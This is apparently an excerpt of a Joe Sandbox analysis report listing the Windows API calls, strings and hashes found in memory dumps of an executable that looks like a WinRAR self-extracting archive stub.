                                                                                      • Opcode ID: 5d6dbec1ba9e4b0105d689584538fe62ce3cab99dd51fad4d2b93242403b9789
                                                                                      • Instruction ID: 201c98bcd07bb35778b4fb0ba4e8d4421ffde59227093624fb8fcba7e6f5573e
                                                                                      • Opcode Fuzzy Hash: 5d6dbec1ba9e4b0105d689584538fe62ce3cab99dd51fad4d2b93242403b9789
                                                                                      • Instruction Fuzzy Hash: 0E311671604B01EFEF22AA7DE855B5AB3E9EB01320F18842DE499D7195DF35AC80CB30
                                                                                      APIs
                                                                                      • GetWindow.USER32(?,00000005), ref: 00D8B8DD
                                                                                      • GetClassNameW.USER32(00000000,?,00000800), ref: 00D8B90C
                                                                                        • Part of subcall function 00D80B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00D7AC49,?,?,?,00D7ABF8,?,-00000002,?,00000000,?), ref: 00D80B28
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00D8B92A
                                                                                      • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00D8B941
                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00D8B954
                                                                                        • Part of subcall function 00D88B22: GetDC.USER32(00000000), ref: 00D88B2E
                                                                                        • Part of subcall function 00D88B22: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D88B3D
                                                                                        • Part of subcall function 00D88B22: ReleaseDC.USER32(00000000,00000000), ref: 00D88B4B
                                                                                        • Part of subcall function 00D88ADF: GetDC.USER32(00000000), ref: 00D88AEB
                                                                                        • Part of subcall function 00D88ADF: GetDeviceCaps.GDI32(00000000,00000058), ref: 00D88AFA
                                                                                        • Part of subcall function 00D88ADF: ReleaseDC.USER32(00000000,00000000), ref: 00D88B08
                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00D8B97B
                                                                                      • DeleteObject.GDI32(00000000), ref: 00D8B982
                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00D8B98B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                                                                                      • String ID: STATIC
                                                                                      • API String ID: 1444658586-1882779555
                                                                                      • Opcode ID: 43883a43aca56eb2a3b2b36fb149718adf703a7ce84fbadad635202a4fd15914
                                                                                      • Instruction ID: bfd6a8feb231fda944cb9cf8a0ce6db5a9fe3f33f412653d00f98daebf6d35be
                                                                                      • Opcode Fuzzy Hash: 43883a43aca56eb2a3b2b36fb149718adf703a7ce84fbadad635202a4fd15914
                                                                                      • Instruction Fuzzy Hash: B921A1726407247BEB217B68DC4AFAE766CEF05720F044112FA01E6291DB645D419BB6
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 00D9623F
                                                                                        • Part of subcall function 00D959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00D99301,?,00000000,?,00000000,?,00D99328,?,00000007,?,?,00D99725,?), ref: 00D959D8
                                                                                        • Part of subcall function 00D959C2: GetLastError.KERNEL32(?,?,00D99301,?,00000000,?,00000000,?,00D99328,?,00000007,?,?,00D99725,?,?), ref: 00D959EA
                                                                                      • _free.LIBCMT ref: 00D9624B
                                                                                      • _free.LIBCMT ref: 00D96256
                                                                                      • _free.LIBCMT ref: 00D96261
                                                                                      • _free.LIBCMT ref: 00D9626C
                                                                                      • _free.LIBCMT ref: 00D96277
                                                                                      • _free.LIBCMT ref: 00D96282
                                                                                      • _free.LIBCMT ref: 00D9628D
                                                                                      • _free.LIBCMT ref: 00D96298
                                                                                      • _free.LIBCMT ref: 00D962A6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: a9715dc71deee10deec5f78f8ddce51c967e5738496683ab02a4c5a57434eb1c
                                                                                      • Instruction ID: b9ca652d8fd4e084b27483672deeb943c3494079a3a3df62fb5fc0309de2f14c
                                                                                      • Opcode Fuzzy Hash: a9715dc71deee10deec5f78f8ddce51c967e5738496683ab02a4c5a57434eb1c
                                                                                      • Instruction Fuzzy Hash: 27116376610608FFDF02EF55D842CD93BA5FF04360B5145A5BA888B226DB31EA509FA0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ;%u$x%u$xc%u
                                                                                      • API String ID: 0-2277559157
                                                                                      • Opcode ID: e2f91f3474462e01eeb7feacf37a5dc4a81f35c403c575c8858a6dbb85164c5a
                                                                                      • Instruction ID: 8095523de16f01ecfc1b012212a21f71ec41ca60c5d24d2be495d2c19dccafdd
                                                                                      • Opcode Fuzzy Hash: e2f91f3474462e01eeb7feacf37a5dc4a81f35c403c575c8858a6dbb85164c5a
                                                                                      • Instruction Fuzzy Hash: C2F116716043C05BDB19EB688895BBA7799EF94300F0C846DFC8D9B283FB249944C776
                                                                                      APIs
                                                                                      • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00D9CCE2,00000000,00000000,00000000,00000000,00000000,00D92C4E), ref: 00D9C5AF
                                                                                      • __fassign.LIBCMT ref: 00D9C62A
                                                                                      • __fassign.LIBCMT ref: 00D9C645
                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00D9C66B
                                                                                      • WriteFile.KERNEL32(?,00000000,00000000,00D9CCE2,00000000,?,?,?,?,?,?,?,?,?,00D9CCE2,00000000), ref: 00D9C68A
                                                                                      • WriteFile.KERNEL32(?,00000000,00000001,00D9CCE2,00000000,?,?,?,?,?,?,?,?,?,00D9CCE2,00000000), ref: 00D9C6C3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                      • String ID: d0F
                                                                                      • API String ID: 1324828854-1238022483
                                                                                      • Opcode ID: 81b9d7fb2a2c6caba45aeeabb3c91c7042ccbdf62f253298c5a1cf398e06094d
                                                                                      • Instruction ID: be9ce840c2551188021c6c48a6b1fa1c922c004eed4e980157c6dc673283dabe
                                                                                      • Opcode Fuzzy Hash: 81b9d7fb2a2c6caba45aeeabb3c91c7042ccbdf62f253298c5a1cf398e06094d
                                                                                      • Instruction Fuzzy Hash: 3C51AEB1A103499FDF10CFA8D885AEEBBF8EF19300F14515AE955E7291E730A940CBB5
                                                                                      APIs
                                                                                        • Part of subcall function 00D712E7: GetDlgItem.USER32(00000000,00003021), ref: 00D7132B
                                                                                        • Part of subcall function 00D712E7: SetWindowTextW.USER32(00000000,00DA02E4), ref: 00D71341
                                                                                      • EndDialog.USER32(?,00000001), ref: 00D899AF
                                                                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 00D899DC
                                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00D899F1
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00D89A02
                                                                                      • GetDlgItem.USER32(?,00000065), ref: 00D89A0B
                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00D89A1F
                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00D89A31
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                      • String ID: LICENSEDLG
                                                                                      • API String ID: 3214253823-2177901306
                                                                                      • Opcode ID: 80dce032a90d4a89b113396a31a0bc505f9ea72389a104ad409a5568573f5066
                                                                                      • Instruction ID: 88a37c639d6d55a8239fdcd88a160150f21d924c2df029fb2b3a7e3defda9e51
                                                                                      • Opcode Fuzzy Hash: 80dce032a90d4a89b113396a31a0bc505f9ea72389a104ad409a5568573f5066
                                                                                      • Instruction Fuzzy Hash: 2421C932240305BFD6117B69ED45E7B7BADEB47B94F094108F681E2290CB66DC01DB76
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D79232
                                                                                      • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00D79255
                                                                                      • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00D79274
                                                                                        • Part of subcall function 00D80B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00D7AC49,?,?,?,00D7ABF8,?,-00000002,?,00000000,?), ref: 00D80B28
                                                                                      • _swprintf.LIBCMT ref: 00D79310
                                                                                        • Part of subcall function 00D73F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D73F6E
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00D79385
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00D793C1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                                                      • String ID: rtmp%d
                                                                                      • API String ID: 2111052971-3303766350
                                                                                      • Opcode ID: b5341d3c85541a9f47f295630e64374173384b9e423e7d3394bceebdb574da71
                                                                                      • Instruction ID: e0b339d78827a9343367faa2af7180fc40a4f315a462febba30bb70b58cd6579
                                                                                      • Opcode Fuzzy Hash: b5341d3c85541a9f47f295630e64374173384b9e423e7d3394bceebdb574da71
                                                                                      • Instruction Fuzzy Hash: CD416B72911258A6DF20FB60CDA5EEEB77CEF45380F0480AAB50DE3142FA349B458B74
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,00D88705,?), ref: 00D87FBA
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000003,00000000,00000000), ref: 00D87FDB
                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00D88002
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocByteCharCreateMultiStreamWide
                                                                                      • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                      • API String ID: 4094277203-4209811716
                                                                                      • Opcode ID: 2737e1a692b3636a7ccce20961a5503ed90257f71c104309e7b35927b74dc10a
                                                                                      • Instruction ID: 477917241c72b2b2724be13b7813c7353e9f38a178d1d23f3772dd55415f6e43
                                                                                      • Opcode Fuzzy Hash: 2737e1a692b3636a7ccce20961a5503ed90257f71c104309e7b35927b74dc10a
                                                                                      • Instruction Fuzzy Hash: C431F0721083117EEB25BB649C06FABB79CDF52720F24410AF614961C2EFB0D909C7B6
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00D87DAF
                                                                                      • GetTickCount.KERNEL32 ref: 00D87DCD
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D87DE3
                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D87DF7
                                                                                      • TranslateMessage.USER32(?), ref: 00D87E02
                                                                                      • DispatchMessageW.USER32(?), ref: 00D87E0D
                                                                                      • ShowWindow.USER32(?,00000005,?,00000000,?,?,?,?,00000000,00000000,00000000,<html>,00000006), ref: 00D87EBD
                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00D87EC7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$CountTickWindow$DispatchPeekShowTextTranslate
                                                                                      • String ID:
                                                                                      • API String ID: 4150546248-0
                                                                                      • Opcode ID: f867ac239ac7afcdd8d46eddcc1ba13bd032d56bc3161be143708233b2ab0163
                                                                                      • Instruction ID: 014df8c6555e8c6df8b1f3085ee239cfd485794c9cbc0df82a6db7e7724f7d66
                                                                                      • Opcode Fuzzy Hash: f867ac239ac7afcdd8d46eddcc1ba13bd032d56bc3161be143708233b2ab0163
                                                                                      • Instruction Fuzzy Hash: 35417871208306AFD711EF69C88896BBBE9EF89704B14086DF546C7260DB71EC49CB72
                                                                                      APIs
                                                                                      • __aulldiv.LIBCMT ref: 00D7FE33
                                                                                        • Part of subcall function 00D7A8E0: GetVersionExW.KERNEL32(?), ref: 00D7A905
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 00D7FE5C
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 00D7FE6E
                                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00D7FE7B
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D7FE91
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D7FE9D
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D7FED3
                                                                                      • __aullrem.LIBCMT ref: 00D7FF5D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                      • String ID:
                                                                                      • API String ID: 1247370737-0
                                                                                      • Opcode ID: eecc66e8500ec29f60e515e318f52ab8e388bfcdef08a11946cf95aaec72c401
                                                                                      • Instruction ID: 67e14d210c68e869f537ffed0c416b7cadfc44a46492d73cdf884a3a38d9039a
                                                                                      • Opcode Fuzzy Hash: eecc66e8500ec29f60e515e318f52ab8e388bfcdef08a11946cf95aaec72c401
                                                                                      • Instruction Fuzzy Hash: 02413CB24083059FC320DF65C8809ABFBF9FF88714F048A2EF59692250E735E548DB66
                                                                                      APIs
                                                                                      • GetTempPathW.KERNEL32(00000800,?), ref: 00D8B0EF
                                                                                      • _swprintf.LIBCMT ref: 00D8B123
                                                                                        • Part of subcall function 00D73F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D73F6E
                                                                                      • SetDlgItemTextW.USER32(?,00000066,00DB3122), ref: 00D8B143
                                                                                      • _wcschr.LIBVCRUNTIME ref: 00D8B176
                                                                                      • EndDialog.USER32(?,00000001), ref: 00D8B257
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                                                      • String ID: %s%s%u
                                                                                      • API String ID: 2892007947-1360425832
                                                                                      • Opcode ID: d0ce88d36a512ffb7b93a100274bad904bcb2138d6df8223c8dfa36bbc0d2518
                                                                                      • Instruction ID: 38a1bdd57363d5b8b4b05851c855453ea5a82517b5c8c046847e6c2ce53a3010
                                                                                      • Opcode Fuzzy Hash: d0ce88d36a512ffb7b93a100274bad904bcb2138d6df8223c8dfa36bbc0d2518
                                                                                      • Instruction Fuzzy Hash: D2417B72900319AEEF25EB64DC85EEE77BCEB08350F0440A6E409EA151EB709B848F74
                                                                                      APIs
                                                                                      Strings
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
Similarity
• API ID: _strlen$_swprintf_wcschr_wcsrchr
• String ID: %08x
• API String ID: 1593746830-3682738293
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
Similarity
• API ID: _free
• String ID: d0F
• API String ID: 269201875-1238022483
APIs
• ShowWindow.USER32(?,00000000), ref: 00D885B5
• GetWindowRect.USER32(?,?), ref: 00D885DA
• ShowWindow.USER32(?,00000005,?), ref: 00D88671
• SetWindowTextW.USER32(?,00000000), ref: 00D88679
• ShowWindow.USER32(00000000,00000005), ref: 00D8868F
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
Similarity
• API ID: Window$Show$RectText
• String ID: RarHtmlClassName
• API String ID: 3937224194-1658105358
APIs
  • Part of subcall function 00D992D3: _free.LIBCMT ref: 00D992FC
• _free.LIBCMT ref: 00D9935D
  • Part of subcall function 00D959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00D99301,?,00000000,?,00000000,?,00D99328,?,00000007,?,?,00D99725,?), ref: 00D959D8
  • Part of subcall function 00D959C2: GetLastError.KERNEL32(?,?,00D99301,?,00000000,?,00000000,?,00D99328,?,00000007,?,?,00D99725,?,?), ref: 00D959EA
• _free.LIBCMT ref: 00D99368
• _free.LIBCMT ref: 00D99373
• _free.LIBCMT ref: 00D993C7
• _free.LIBCMT ref: 00D993D2
• _free.LIBCMT ref: 00D993DD
• _free.LIBCMT ref: 00D993E8
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• GetLastError.KERNEL32(?,?,00D90C0B,00D8E662), ref: 00D90C22
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D90C30
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D90C49
• SetLastError.KERNEL32(00000000,?,00D90C0B,00D8E662), ref: 00D90C9B
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
Similarity
• API ID:
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
• API String ID: 0-1718035505
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D94A90,?,?,00D94A30,?,00DA7F68,0000000C,00D94B87,?,00000002), ref: 00D94AFF
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D94B12
• FreeLibrary.KERNEL32(00000000,?,?,?,00D94A90,?,?,00D94A30,?,00DA7F68,0000000C,00D94B87,?,00000002,00000000), ref: 00D94B35
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$d0F$mscoree.dll
• API String ID: 4061214504-1228497898
APIs
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00D800AE
  • Part of subcall function 00D7A8E0: GetVersionExW.KERNEL32(?), ref: 00D7A905
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00D800D0
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00D800EA
• TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00D800FB
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00D8010B
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00D80117
Memory Dump Source
